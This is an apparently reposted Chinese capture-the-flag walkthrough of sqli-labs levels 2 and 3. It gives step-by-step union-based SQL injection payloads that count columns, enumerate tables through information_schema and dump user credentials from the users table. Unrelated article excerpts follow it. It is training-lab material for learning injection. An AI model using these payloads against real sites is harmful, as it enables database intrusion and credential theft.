【sqli靶場】第二關和第三關通關思路

目錄

前言

一、sqli靶場第二關

1.1 判斷注入類型

1.2?判斷數據表中的列數

1.3?使用union聯合查詢

1.4 使用group_concat()函數

1.5 爆出users表中的列名

1.6 爆出users表中的數據

二、sqli靶場第三關

2.1 判斷注入類型

2.2 觀察報錯??

2.3?判斷數據表中的列數

2.4?使用union聯合查詢

2.5 使用group_concat()函數

2.6 爆出users表中的列名

2.7 爆出users表中的數據


🌈嗨!我是Filotimo__🌈。很高興與大家相識,希望我的博客能對你有所幫助。

💡本文由Filotimo__??原創,首發于CSDN📚。

📣如需轉載,請事先與我聯系以獲得授權??。

🎁歡迎大家給我點贊👍、收藏??,并在留言區📝與我互動,這些都是我前進的動力!

🌟我的格言:森林草木都有自己認為對的角度🌟。

前言

sqli靶場第一關:https://filotimo.blog.csdn.net/article/details/134626587?spm=1001.2014.3001.5502


一、sqli靶場第二關

1.1 判斷注入類型

輸入?id=1',顯示語法錯誤。
輸入?id=1'',顯示語法錯誤。
輸入?id=1/1,正常回顯。
輸入?id=1/0,爆出如下頁面:

證明存在數字型注入。

1.2?判斷數據表中的列數

介紹一個方法:二分法

其基本思想是將待查找的區間不斷二分,以縮小查找范圍,直到找到目標元素。

輸入?id=1 order by 10 --+,出現回顯Unknown column '10' in 'order clause'。

用一下二分法,輸入?id=1 order by 5 --+,仍然回顯Unknown column '10' in 'order clause'。

繼續,輸入?id=1 order by 3 --+,正常回顯。

輸入?id=1 order by 4 --+,回顯Unknown column '10' in 'order clause'。

說明列數為3。

1.3?使用union聯合查詢

聯合查詢是 sql中用于將兩個或多個查詢的結果集組合成一個結果集的操作。使用union聯合查詢的前提是被聯合的查詢必須擁有相同數量的列,列的數據類型必須兼容。

輸入?id=0 union select 1,2,3--+,用來判斷回顯位,其中的0是不存在的id值,這是為了使后方語句union select 1,2,3能夠執行,頁面如下:

輸入?id=0 union select 1,2,database()--+爆出數據庫名

1.4 使用group_concat()函數

group_concat()函數是 MySQL 中的聚合函數,用于將多行數據按照指定的分隔符連接為一個字符串。

構造:

?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆出了表名:

1.5 爆出users表中的列名

構造:

?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

獲得了users表中的列名:

1.6 爆出users表中的數據

查看users表中所有的用戶:

?id=0 union select 1,2,group_concat(username) from security.users --+

查看users表中所有的用戶密碼:

?id=0 union select 1,2,group_concat(password) from security.users --+

用concat_ws(':',A,B)函數,拼接用戶名和密碼,使其成對出現

?id=0 union select 1,2,group_concat(concat_ws(':',username,password)) from security.users --+

二、sqli靶場第三關

2.1 判斷注入類型

輸入?id=1',顯示語法錯誤。


輸入?id=1'',正常回顯。
輸入?id=1/1,正常回顯。
輸入?id=1/0,正常回顯。

判斷為字符型注入(初步判斷為單引號閉合)。

2.2 觀察報錯??

報錯信息為''1'') LIMIT 0,1'?

進一步判斷為')閉合

輸入?id=1') --+,正常回顯。

2.3?判斷數據表中的列數

輸入?id=1') order by 3 --+,正常回顯。

輸入?id=1') order by 4 --+,顯示超出。

用二分法與order by確定列數為3

2.4?使用union聯合查詢

輸入?id=0') union select 1,2,3--+,判斷回顯位,頁面如下:

輸入?id=0') union select 1,2,database()--+爆出數據庫名:

2.5 使用group_concat()函數

輸入:

?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆出表名:

2.6 爆出users表中的列名

輸入:

?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

獲得了users表中的列名:

2.7 爆出users表中的數據

查看users表中所有的用戶:

?id=0') union select 1,2,group_concat(username) from security.users --+

查看users表中所有的用戶密碼:

?id=0') union select 1,2,group_concat(password) from security.users --+

用concat_ws(':',A,B)函數,拼接用戶名和密碼,使其成對出現

?id=0') union select 1,2,group_concat(concat_ws(':',username,password)) from security.users --+

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/215936.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/215936.shtml
英文地址,請注明出處:http://en.pswp.cn/news/215936.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Emutouch學習筆記

1 項目依賴 DeviceFarmer/minitouch 1.1 確認submodule引用的 commit ID git submodule status1.2 更新子模塊到最新版本 git submodule init && git submodule update --remote

Android:監聽開機廣播自己喚醒

要通過代碼獲取安卓系統的開機廣播消息,并在收到消息后拉起當前apk,您可以使用以下步驟: 創建一個廣播接收器(Broadcast Receiver)來接收開機廣播消息。在接收到開機廣播消息時,您可以在接收器中編寫代碼來…

什么是 web 組態?web 組態與傳統組態的區別是什么?

組態軟件是一種用于控制和監控各種設備的軟件,也是指在自動控制系統監控層一級的軟件平臺和開發環境。這類軟件實際上也是一種通過靈活的組態方式,為用戶提供快速構建工業自動控制系統監控功能的、通用層次的軟件工具。通常用于工業控制,自動…

Spring Boot整合 Spring Security

Spring Boot整合 1、RBAC 權限模型 RBAC模型(Role-Based Access Control:基于角色的訪問控制) 在RBAC模型里面,有3個基礎組成部分,分別是:用戶、角色和權限,它們之間的關系如下圖所示 SELECT…

02.類模板

2、類模板 2.1 類模板語法 建立一個通用類&#xff0c;類中的成員、數據類型可以不具體制定&#xff0c;用一個虛擬的類型來代表。 template<typename T> // 類template&#xff1a;聲明創建模板typename&#xff1a;表名其后面的符號是一種數據類型&#xff0c;可以用 …

【算法】算法題-20231211

這里寫目錄標題 一、387. 字符串中的第一個唯一字符二、1189. “氣球” 的最大數量三、1221. 分割平衡字符串 一、387. 字符串中的第一個唯一字符 簡單 給定一個字符串 s &#xff0c;找到 它的第一個不重復的字符&#xff0c;并返回它的索引 。如果不存在&#xff0c;則返回…

算法通關村第十五關 | 青銅 | 用4KB內存尋找重復元素

處理海量數據的思路 1.使用位存儲&#xff1a;占用的空間是存整數的 1/8 。 2.分塊&#xff1a;也叫外部排序&#xff0c;將大文件劃分為若干小塊&#xff0c;先處理小塊再逐步得到想要的結果&#xff0c;需要至少遍歷兩次全部序列&#xff0c;是用時間換空間的方法。 3.堆&…

Mockjs 增、刪、改、查(分頁、多條件查詢)

查&#xff08;分頁、多條件查詢&#xff09;&#xff1a; 關鍵代碼&#xff1a; Mock.mock(/vue-table-list/tableLinkage/list, post, (option) > {// console.log("&#x1f680; ~ file: tableLinkage.js:66 ~ Mock.mock ~ option:", option)const params J…

MFC畫折線圖,基于x64系統

由于項目的需要&#xff0c;需要畫一個折線圖。 傳統的Teechart、MSChart、HighSpeedChart一般是只能配置在x86系統下&#xff0c;等到使用x64系統下運行就是會報出不知名的錯誤&#xff0c;這個地方讓人很苦惱。 我在進行配置的過程之中&#xff0c;使用Teechart將x86配置好…

基于Java SSM框架實現班級同學錄、聚會報名網站系統項目【項目源碼+論文說明】

基于java的SSM框架實現班級同學錄聚會報名網站系統演示 摘要 21世紀的今天&#xff0c;隨著社會的不斷發展與進步&#xff0c;人們對于信息科學化的認識&#xff0c;已由低層次向高層次發展&#xff0c;由原來的感性認識向理性認識提高&#xff0c;管理工作的重要性已逐漸被人…

程序員考公筆記之邏輯判斷(圖形推理)

文章目錄 寫在前面1、邏輯判斷1.1、圖形推理1.1.1、位置類1.1.2、樣式類1.1.3、數量類1.1.4、屬性類1.1.5、六面體 寫在前面 1、邏輯判斷 1.1、圖形推理 觀察&#xff1a;先宏觀&#xff0c;再微觀 圖形推理的命題形式&#xff1a; 一組式 觀察路徑&#xff1a;順序看(考最…

解決方案- 材料吸波、屏蔽性能測試系統 (10MHz~500GHz)

材料吸波、屏蔽性能測試系統 &#xff08;10MHz~500GHz&#xff09; 材料電磁參數綜合測試解決方案 材料吸波、屏蔽性能測試系統測試頻率范圍可達10MHz&#xff5e;500GHz&#xff0c;可實現材料反射率、屏蔽性能特性參數測試。系統由矢量網絡分析儀、測試夾具、系統軟件等組…

申論筆記(思路技巧)

文章目錄&#xff1a; 一&#xff1a;福利 二&#xff1a;常見題型 1.歸納概括題 2.提出對策/措施/建議題 2.1 找到對策的來源 2.2 提煉對策 2.3 明確是否需要先概括問題 2.4 對策表述三部曲 3.綜合分析題 3.1 綜合分析最大的難點 3.2 分析問題的技巧 4.應用文/公文…

力扣每日一題day34[110. 平衡二叉樹]

給定一個二叉樹&#xff0c;判斷它是否是高度平衡的二叉樹。 本題中&#xff0c;一棵高度平衡二叉樹定義為&#xff1a; 一個二叉樹每個節點 的左右兩個子樹的高度差的絕對值不超過 1 。 示例 1&#xff1a; 輸入&#xff1a;root [3,9,20,null,null,15,7] 輸出&#xff1a;t…

wappalyzer基于插件的網站開發技術解析工具

一、wappalyzer 解釋&#xff1a;這是一款強大的工具&#xff0c;其主要能提供一種快速、可靠地檢測網站所使用技術棧的方法&#xff0c;也就說說&#xff0c;服務器發來的信息都會被它剖析&#xff0c;然后分析出前端的技術棧&#xff0c;有時后端所使用的技術棧如果網頁特征…

[ 藍橋杯Web真題 ]-冬奧大抽獎

目錄 介紹 準備 目標 規定 思路 知識補充 解法參考 介紹 藍橋云課慶冬奧需要舉行一次抽獎活動&#xff0c;我們一起做一個頁面提供給云課冬奧抽獎活動使用。 準備 開始答題前&#xff0c;需要先打開本題的項目代碼文件夾&#xff0c;目錄結構如下&#xff1a; ├──…

甲醛處理企業網站效果如何

甲醛往往是新裝房間主所擔心的問題&#xff0c;而甲醛處理公司則可以處理甲醛問題&#xff0c;市場需求也比較高&#xff0c;雖然具備同城服務屬性&#xff0c;但外地或連鎖經營也非常適合&#xff0c;而品牌們也遇到一些痛點&#xff1a; 1、品牌宣傳拓客難 甲醛處理公司也需…

公司app定制開發 ,打造專屬企業移動應用

公司app定制&#xff1a;打造專屬企業移動應用 在當今數字化時代&#xff0c;移動應用已經成為了人們生活中不可或缺的一部分&#xff0c;越來越多的企業也意識到了移動應用對于企業形象和業務拓展的重要性&#xff0c;為了滿足企業的需求&#xff0c;公司app定制服務應運而生…

基于查表法的水流量算法設計與實現

寫在前面 本文分享的是一種基于查表法的水流量的算法方案設計與實現&#xff0c;算法簡單易懂&#xff0c;主要面向初學者&#xff0c;有兩個目的&#xff1a;一是給初學者一些算法設計的思路引導&#xff1b;二是引導初學者學習怎樣用C語言編程實現。 一、設計需求 基于“19…

C++ 中的引用

文章目錄 C 引用的應用1. 修改函數中傳遞的參數2. 避免復制大型結構3. for 循環中修改所有對象4. for 循環中避免復制對象 References vs Pointers引用的限制使用引用的優點練習Quesition 1Question 2Question 3Question 4Question 5Question 6 如果一個變量被聲明為引用&#…